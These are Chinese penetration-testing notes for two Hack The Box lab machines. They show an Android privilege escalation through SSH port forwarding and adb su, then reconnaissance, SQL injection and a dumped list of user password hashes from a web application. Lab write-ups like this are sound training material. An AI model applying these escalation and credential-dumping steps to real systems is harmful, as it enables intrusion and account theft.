像是linux根目录下的目录结构,但是有些不同,并没有找到home目录,试着查看几个感兴趣的目录:

:/ $ ls -liah data 
ls: data: Permission denied
1|:/ $ ls -liah sdcard
5285 lrwxrwxrwx 1 root root 21 2024-02-19 22:42 sdcard -> /storage/self/primary
:/ $ cd /storage/self/primary
:/storage/self/primary $ ls -liah
total 34K
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 .
172116 drwx--x--x  4 root everybody 4.0K 2021-03-13 17:16 ..
181241 drwxrwx---  5 root everybody 4.0K 2021-03-13 17:30 .estrongs
180902 -rw-rw----  1 root everybody   72 2024-02-19 22:43 .userReturn
180804 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Alarms
180773 drwxrwx---  3 root everybody 4.0K 2021-03-13 17:16 Android
180809 drwxrwx---  2 root everybody 4.0K 2021-04-21 02:38 DCIM
180808 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:37 Download
180807 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Movies
180801 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Music
180805 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Notifications
180806 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Pictures
180802 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Podcasts
180803 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:16 Ringtones
188897 drwxrwx---  3 root everybody 4.0K 2021-03-13 17:30 backups
188491 drwxrwx---  2 root everybody 4.0K 2021-04-21 02:12 dianxinos
180731 -rw-rw----  1 root everybody   33 2021-03-13 18:28 user.txt

我们在挂载的sdcard对应路径中发现了user.txt

:/storage/self/primary $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

我们还发现了一个感兴趣的backups目录:

:/storage/self/primary $ cd backups
:/storage/self/primary/backups $ ls -liah
total 6.0K
188897 drwxrwx---  3 root everybody 4.0K 2021-03-13 17:30 .
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 ..
188898 drwxrwx---  2 root everybody 4.0K 2021-03-13 17:30 apps
:/storage/self/primary/backups $ cd apps
:/storage/self/primary/backups/apps $ ls -liah                                 
total 4.0K
188898 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:30 .
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 ..

然而并没有任何内容,继续寻找其他可能的有兴趣路径,虽然这是androd,但是我们也可以尝试在寻找linux提权时的可能攻击路径,多次尝试后并没有发现太多感兴趣的东西,确切来说是没什么经验所以找不到

初探ADB

从之前的端口扫描结果来看,虽然nmap扫描的5555端口对应服务可能是freeciv,但也有很大可能性是ADB,由于我们的目的是权限提升,ADB又必须要最高权限才能正常使用,因此优先考虑尝试利用ADB,先查看5555端口的具体情况:

:/ $ ss -tln
State       Recv-Q Send-Q Local Address:Port               Peer Address:Port              
LISTEN      0      50           *:2222                     *:*                  
LISTEN      0      8       [::ffff:127.0.0.1]:35955                    *:*                  
LISTEN      0      4            *:5555                     *:*                  
LISTEN      0      10           *:42135                    *:*                  
LISTEN      0      50      [::ffff:10.129.178.12]:40471                    *:*                  
LISTEN      0      50           *:59777                    *:*         

可以知道5555端口在目标机器内部确实处于监听状态,而外部的nmap扫描时显示被过滤,此时我们可以尝试,这也间接说明这个端口和ADB的高价值,否则没有必要过滤和隐藏,我们还可以尝试用本地的adb工具或nc连接目标,作为验证的手段:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 10.129.178.12
failed to connect to '10.129.178.12:5555': Connection timed out

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nc 10.129.178.12 5555
Ncat: TIMEOUT.

两种方式都连接超时

ssh端口转发

但是我们已经拿到了目标的普通用户shell,我们完全可以通过ssh隧道的端口转发方式来绕过该过滤:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -L 5555:localhost:5555 kristi@10.129.178.12 -p 2222 -oHostKeyAlgorithms=ssh-rsa                         
Password authentication
(kristi@10.129.178.12) Password: 
:/ $ 

这是将目标的本地端口5555转发到我们kali的本地端口5555

远程连接ADB

重新尝试连接ADB,此时发现能连接上了:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 127.0.0.1
connected to 127.0.0.1:5555

权限提升

既然连接上ADB,就可以尝试返回shell然后直接提权了:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb shell            
x86_64:/ $ whoami                                                                                                    
shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # whoami
root
:/ # cd data
:/data # ls
adb           bootchart     media       property       tombstones 
anr           cache         mediadrm    resource-cache user       
app           dalvik-cache  misc        root.txt       user_de    
app-asec      data          misc_ce     ss             vendor     
app-ephemeral drm           misc_de     ssh_starter.sh vendor_ce  
app-lib       es_starter.sh nfc         system         vendor_de  
app-private   local         ota         system_ce      
backup        lost+found    ota_package system_de      
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5

由于之前data这个目录没有权限访问,现在以root身份重新访问也终于看到了最终的flag

总结

nmap扫描结果显示的都是一些比较陌生的非常规端口,因为我们的目标是一个陌生设备,所以这台机器主要还是锻炼信息搜集的思维,作为第一次接触androd设备渗透测试的入门机器挺合适的,可以了解androd的基本目录结构以及积累一些可能的有价值攻击路径,还有对安卓设备调试最常用的ADB工具有基本的了解以及作为安卓提权手段经验的积累,相对来说的难点就是ssh的端口转发部分

StreamIO

“红队笔记”学习记录

机器介绍

StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we use `WinPEAS` to enumerate the system and find saved browser databases, which are decoded to expose new credentials. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.
StreamIO 是一台中型计算机,它涵盖了导致 SQL 注入的子域枚举,以便检索存储的用户凭据,这些凭据被破解以获得对管理面板的访问权限。管理面板容易受到 LFI 的攻击,这使我们能够检索管理页面的源代码,并导致识别远程文件包含漏洞,滥用该漏洞可以让我们访问系统。在初始 shell 之后,我们利用 SQLCMD 命令行实用工具枚举数据库并获取横向移动中使用的更多凭据。作为次要用户,我们使用“WinPEAS”来枚举系统并查找已保存的浏览器数据库,这些数据库被解码以公开新凭据。使用 BloodHound 中的新凭据,我们发现用户能够将自己添加到可以读取 LDAP 密钥的特定组中。在没有直接访问帐户的情况下,我们使用 PowerShell 滥用此功能并将自己添加到“核心员工”组,然后访问 LDAP 以披露管理员 LAPS 密码。

难度

Medium

信息搜集

tcp全端口扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap --min-rate 10000 -sT -p- 10.129.226.249 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.82% done; ETC: 17:25 (0:00:11 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49744/tcp open  unknown
52734/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 93.82 seconds

端口信息处理:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# export $ports
export: not an identifier: 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734

tcp详细扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap -sT -sC -sV -T4 -O -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:34 CST
NSOCK ERROR [202.3680s] mksock_bind_addr(): Bind to 0.0.0.0:902 failed (IOD #153): Address already in use (98)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-20 16:34:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2024-02-20T16:37:42+00:00; +6h59m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49744/tcp open  msrpc         Microsoft Windows RPC
52734/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (87%)
Aggressive OS guesses: Microsoft Windows Server 2019 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-20T16:37:05
|_  start_date: N/A
|_clock-skew: mean: 6h59m34s, deviation: 0s, median: 6h59m34s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.77 seconds

udp端口扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.226.249 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 29.75% done; ETC: 17:28 (0:02:57 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.27s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 1371.18 seconds

脚本漏扫:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:36 CST
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.30s latency).

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49744/tcp open  unknown
52734/tcp open  unknown

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 3048.36 seconds

扫描结果分析

从端口扫描的结果来看,这很有可能是一台域控制器,因为很多开放的端口以及服务都符合域控制器的特征,并且暴露了域名,且最大可能性是windows server2019,其中攻击面的优先级中,优先考虑smb(445)、ldap、web,另外,记住一遇到域名,先写入到本机的host文件中。

wfuzz子域名爆破

为了保证信息搜集的完整性,可以进行子域名爆破,因为除了watch,还可能存在其他可能有价值的子域名没有被nmap扫描到,可以用wfuzz:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb -H "HOST: FUZZ.streamio.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt      
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload      
。。。
000004427:   404        6 L      24 W       315 Ch      "www.biz - www.biz"                                                                                                             
000004409:   404        6 L      24 W       315 Ch      "mail07 - mail07"                                                                                                               
000004423:   404        6 L      24 W       315 Ch      "samp - samp"                                                                                                                   
000004413:   404        6 L      24 W       315 Ch      "www.money - www.money"                                                                                                         
000004417:   404        6 L      24 W       315 Ch      "author - author"                                                                                                               
000004418:   404        6 L      24 W       315 Ch      "diablo - diablo"                                                                                                               
000004415:   404        6 L      24 W       315 Ch      "sydney - sydney"                                                                                                               
000004420:   404        6 L      24 W       315 Ch      "word - word"                                                                                                                   
000004416:   404        6 L      24 W       315 Ch      "kraken - kraken"                                                                                                               
000004419:   404        6 L      24 W       315 Ch      "wwwww - wwwww"                                                                                                                 
000004412:   404        6 L      24 W       315 Ch      "jg - jg"                                                                                                                       
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 283.9004
Processed Requests: 4456
Filtered Requests: 0
Requests/sec.: 15.69564

并没有爆破出其他子域名

利用

尝试获取smb共享

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H 10.129.226.204                                                                  

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)                                

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbclient -L //10.129.226.204 -N                     
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb 10.129.226.204            
SMB         10.129.226.204  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)

虽然说没办法获取到smb下可访问的共享,但是crackmapexec获取到了新的子域名dc.streamio.htb,同样添加到host文件中

smbmap多用于探测、扫描,获取结构类型的信息,在扫描smb映射上非常强大;smbclient多用于与smb服务进行交互,访问、获取资源;crackmapexec则功能综合很强大,在动态目录的评估上不可或缺,通过内置的标准的动态目录功能和协议实现的,所以对于一些终端保护、入侵检测和防御等设备的保护措施具有一定的免杀效果,它也依赖impact库,自己也有数据库,可以用cmedb命令来访问,比如:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cmedb                          
cmedb (default)(smb) > help

Documented commands (type help <topic>):
========================================
help

Undocumented commands:
======================
back  creds  exit  export  groups  hosts  import  shares

cmedb (default)(smb) > hosts

+Hosts---+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| HostID | Admins    | IP             | Hostname | Domain         | OS                       | SMBv1 | Signing |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| 1      | 0 Cred(s) | 10.129.228.115 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 2      | 0 Cred(s) | 10.129.207.210 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 3      | 0 Cred(s) | 10.129.229.178 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 4      | 1 Cred(s) | 10.129.229.198 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0     | 1       |
| 5      | 0 Cred(s) | 10.129.226.204 | DC       | STREAMIO       | Windows 10.0 Build 17763 | 0     | 1       |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+

另外,在域的搜集中还经常用到enum4linux:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# enum4linux 10.129.226.204 
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 21 14:17:48 2024

 =========================================( Target Information )=========================================

Target ........... 10.129.226.204
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.129.226.204 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 10.129.226.204 )===============================

Looking up status of 10.129.226.204
No reply from 10.129.226.204

 ==================================( Session Check on 10.129.226.204 )==================================


[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

综上,针对于smb服务的攻击并没有太多有价值的发现

尝试访问web服务

发现无论是访问ip、还是主域名和子域名,页面总是回显同一个iis的默认页面:
2024-02-21-14-23-57
并且查看源码后也没有什么发现,因此按照经验,可以做个目录爆破,看是否有什么隐藏目录可以利用:

目录爆破
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# gobuster dir -u http://streamio.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://streamio.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================

与此同时,还可以爆破子域名的目录,与上面同理。

网站功能点初探

注意:由于我们上面访问的是http的,还可以访问https看看是否还是回显同样的页面,并不是:
2024-02-21-14-34-37
2024-02-21-14-34-56
是一个在线电影流媒体服务网站,大致地点击所有的功能点,寻找有价值信息,其中在about us下面,有网站管理者和开发者的信息,这必须要保持敏感,因为很可能非常有价值,先记录下来,并且底部还有邮箱地址,也记录:
2024-02-21-14-49-45
contact us的表单中,可以测试基本的xss漏洞:
2024-02-21-14-52-36
虽然能够提交,但是如果并非反射型xss,除非我们能够找到存储该提交信息的页面,此时还不能说明不存在xss漏洞,暂时放弃,
查看控制台的网络
2024-02-21-14-56-02
说明该iis服务配置的是支持asp也还可能支持asp.net,并且暴露了php版本,这些信息暂时记录下来,所以后续利用时,不要忘记对aspx的利用。
另外,有个登录表单,尝试sql注入:
2024-02-21-15-01-24
尝试弱密码以及注册再登陆后,都无法成功
分别对https的这两个网站也进行目录爆破,然后放在一边
注意:这里存在证书的问题

Error: error on running gobuster: unable to connect to https://streamio.htb/: Get "https://streamio.htb/": tls: failed to verify certificate: x509: certificate has expired or is not yet valid: current time 2024-02-21T15:05:43+08:00 is after 2022-03-24T07:03:28Z

加个-k参数即可解决,然后继续探测子域名watch网站的功能点:
只有一个订阅可尝试利用,输入邮箱后也没有什么特别的
对于资产较多的环境中,在目录爆破时,最好再用另一个目录爆破工具进行交叉验证:
比如feroxbuster:

┌──(root㉿hunter)-[/home/cvestone]                            
└─# feroxbuster -u https://streamio.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k                                                             
                                                                                                                                                                                                 
 ___  ___  __   __     __      __         __   ___                                                                                                                                               
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__                                                                                                                                                
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___                                                                                                                                               
by Ben "epi" Risher 🤓                 ver: 2.10.1                                                                                                                                               
───────────────────────────┬──────────────────────                                                                                                                                               
 🎯  Target Url            │ https://streamio.htb                                                                                                                                                
 🚀  Threads               │ 50                                                                                                                                                                  
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt                                                                                     
 👌  Status Codes          │ All Status Codes!                                                                                                                                                   
 💥  Timeout (secs)        │ 7                                                                                                                                                                   
 🦡  User-Agent            │ feroxbuster/2.10.1                                                                                                                                                  
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml                                                                                                                                  
 🔎  Extract Links         │ true                                                                                                                                                                
 💲  Extensions            │ [php]                                                                                                                                                               
 🏁  HTTP methods          │ [GET]                                                                                                                                                               
 🔓  Insecure              │ true                                                                                                                                                                
 🔃  Recursion Depth       │ 4                                                                                                                                                                   
───────────────────────────┴──────────────────────                                                                                                                                               
 🏁  Press [ENTER] to use the Scan Management Menu™                                                                                                                                              
──────────────────────────────────────────────────                                                                                                                                               
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                          
301      GET        2l       10w      151c https://streamio.htb/images => https://streamio.htb/images/                                                                                           
301      GET        2l       10w      150c https://streamio.htb/admin => https://streamio.htb/admin/                                                                                             
301      GET        2l       10w      147c https://streamio.htb/js => https://streamio.htb/js/                                                                                                   
301      GET        2l       10w      148c https://streamio.htb/css => https://streamio.htb/css/                                                                                                 
200      GET      231l      571w     7825c https://streamio.htb/about.php                                              
。。。

其中,在这几次目录爆破中,发现的有价值信息如下:

200      GET        2l        6w       58c https://streamio.htb/admin/master.php 
200      GET     7193l    19558w   253905c https://watch.streamio.htb/search.php
200      GET       20l       47w      677c https://watch.streamio.htb/blocked.php
/images               (Status: 301) [Size: 151] [--> https://streamio.htb/images/]                                                                                                                                    
/Images               (Status: 301) [Size: 151] [--> https://streamio.htb/Images/]                                                                                                                                    
/admin                (Status: 301) [Size: 150] [--> https://streamio.htb/admin/]                                                                                                                                     
/css                  (Status: 301) [Size: 148] [--> https://streamio.htb/css/]                                                                                                                                       
/js                   (Status: 301) [Size: 147] [--> https://streamio.htb/js/]                                                                                                                                        
/fonts                (Status: 301) [Size: 150] [--> https://streamio.htb/fonts/]                                                                                                                                     
/IMAGES               (Status: 301) [Size: 151] [--> https://streamio.htb/IMAGES/]                                                                                                                                    
/Fonts                (Status: 301) [Size: 150] [--> https://streamio.htb/Fonts/]                                                                                                                                     
/Admin                (Status: 301) [Size: 150] [--> https://streamio.htb/Admin/]                                                                                                                                     
/*checkout*           (Status: 400) [Size: 3420]                                                                                                                                                                      
/CSS                  (Status: 301) [Size: 148] [--> https://streamio.htb/CSS/]                                                                                                                                       
/JS                   (Status: 301) [Size: 147] [--> https://streamio.htb/JS/]       

访问几个关键的目录:
2024-02-21-17-15-57
2024-02-21-17-17-05
2024-02-21-17-17-56
2024-02-21-17-18-29
2024-02-21-17-19-14
而这些很多关键信息只有feroxbuster才扫得到,所以很多时候仅仅只用一个工具是不够的
其中,master.php提供了很关键的信息,表明只有通过includes方式才能访问到该页面,推测可能和文件包含漏洞相关。并且blocked.php的出现说明后端很可能存在waf,某些通用行为很可能被拦截。这里的子域名网站中暴露了搜索页面search.php,显然和数据库交互有关,可以尝试sql注入

sql注入

探针:
2024-02-25-15-12-41
发现支持模糊匹配搜索、不区分大小写搜索,说明后端数据库的sql语句可能类似如下:
SELECT * FROM movies WHERE name LIKE '%[input]%';
当我们拼接一些sql注入的特殊符号时,发现也能正常返回结果:
2024-02-25-15-22-47
说明存在sql注入漏洞,因为正常来说它不应该被代入后端数据库执行成功,而当我们尝试直接输入一些通用的sql语句时,被waf拦截了,比如包含all(这里虽然写拦截5分钟,但是作为靶机,我们只要重新返回提交表单的页面即可重新搜索)
开始标准的sql注入流程:
2024-02-25-15-39-23
找到注入点,尝试获取更多数据:
版本信息:
2024-02-25-15-43-05
获取数据库:
2024-02-25-15-45-33
显然当前数据库是STREAMIO,另外要注意streamio_backup也很重要,这两个数据库中都很有可能获取可以撞库的凭据信息
查看当前数据库:
2024-02-25-15-53-52
获取当前数据库中所有用户表的名称和标识符:
2024-02-25-16-16-01
记录下这两个对应的id,继续获取相应字段名称:
2024-02-25-16-22-32
获取关键凭据:
2024-02-25-16-26-42
提取出所有的凭据并处理数据:
先复制所有凭据所在div中的html代码:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# head -n 20 creds_in_html.txt 
                <div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">admin                                             :665a50ac9eaa781e4f7f04199db97a11                  </h5>
                                </div>
                                <div class="ms-auto p-2">
                                        <span class="">3</span>
                                        <button class="btn btn-dark" onclick="unavailable();">Watch</button>
                                </div>
                        </div><div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">Alexendra                                         :1c2b3d8270321140e5153f6637d3ee53                  </h5>
                                </div>
                                <div class="ms-auto p-2">
                                        <span class="">3</span>
                                        <button class="btn btn-dark" onclick="unavailable();">Watch</button>
                                </div>
                        </div><div class="d-flex movie align-items-end">
                                <div class="mr-auto p-2">
                                        <h5 class="p-2">Austin                                            :0049ac57646627b8d7aeaccf8b6a936f                  </h5>
                                </div>

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# grep h5 creds_in_html.txt | sed -e 's/<h5 class="p-2">//g' -e 's/<\/h5>//g' | tr -d " \t" | tee creds.txt
admin:665a50ac9eaa781e4f7f04199db97a11
Alexendra:1c2b3d8270321140e5153f6637d3ee53
Austin:0049ac57646627b8d7aeaccf8b6a936f
Barbra:3961548825e3e21df5646cafe11c6c76
Barry:54c88b2dbd7b1a84012fabc1a4c73415
Baxter:22ee218331afd081b0dcd8115284bae3
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8
Carmon:35394484d89fcfdb3c5e447fe749d213
Clara:ef8f3d30a856cf166fb8215aca93e9ff
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5
Garfield:8097cedd612cc37c29db152b6e9edbd3
Gloria:0cfaaaafb559f081df2befbe66686de0
James:c660060492d9edcaa8332d89c99c9239
Juliette:6dcd87740abb64edfa36d170f0d5450d
Lauren:08344b85b329d7efd611b7a7743e8a09
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f
Lucifer:7df45a9e3de3863807c026ba48e55fb3
Michelle:b83439b16f844bd6ffe35c02fe21b3c0
Oliver:fd78db29173a5cf701bd69027cb9bf6b
Robert:f03b910e2bd0313a23fdd7575f34a694
Robin:dc332fb5576e9631c9dae83f194f8e70
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5
Samantha:083ffae904143c4796e464dac33c1f7d
Stan:384463526d288edcc95fc3701e523bc7
